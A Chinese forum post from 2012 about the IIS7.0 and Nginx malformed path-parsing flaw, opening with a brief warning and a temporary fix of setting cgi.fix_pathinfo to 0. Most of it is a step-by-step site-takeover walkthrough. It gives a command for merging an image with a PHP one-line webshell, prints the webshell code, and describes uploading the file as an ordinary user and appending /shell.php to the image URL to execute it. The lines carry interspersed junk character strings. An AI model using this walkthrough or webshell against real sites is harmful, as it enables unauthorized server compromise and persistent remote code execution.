IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0 ) k$ n. p$ ^% e3 c
Nginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。( z, ^4 u, t5 S- ]5 p7 z0 x
__________________________________ + d" `7 t; K7 g
; D a; G( k1 A% f: H" R' {2 E6 g先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载) 6 ^& U( M W) ~$ f* W
先合并一张PHP一句话图片马,合并方法: 5 P( M! W1 c+ p3 f/ k; }7 F
①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif # `( w2 P* \9 Z. s5 H# g v
②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为"<?fputs(fopen("shell.PHP","w"),"<?eval($_POST[akt]);?>")?>"
! l0 Q9 {& J) d6 ]图片随便找一张. ' t( l& Q' x9 O! _) w
一句话:<?php fputs(fopen(shell.php,w),<?php eval($_POST[akt])?>);?> : E4 W7 \$ y/ g6 w* B3 e0 o: r$ u( f' D
然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。
4 z+ d3 g6 n" J$ ~. W找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。
- F3 B: {! i0 Q) H* |- ^: ^; X比如假设图片地址为 http://www.political-security.com/tupian/1.jpg
$ c8 }1 P8 q" Y5 X" J# e6 g则执行地址为 http://www.political-security.com/tupian/1.jpg/shell.php
8 E9 V& e2 ^7 P然后,会在目录下生成shell.php。比如: www.political-security.com/tupian/shell.php 5 a) q9 n* y& B% Y# Z8 d: R% V
shell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。 , c7 L5 u; v) k9 |$ I2 M9 u3 {
上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。
6 U, [" z. Y l( {% w( u' T找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。
: u2 G( |4 T( g4 B! Q6 v" n2 v/ n$ g在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。
- ^7 z2 N! ?$ b6 F7 Y剩下的就随便你去搞吧。
/ q2 X3 I# ^/ J, @
' S6 @0 D' c' x* h; u |
发表于 2012-9-27 19:40:10
收藏
支持
反对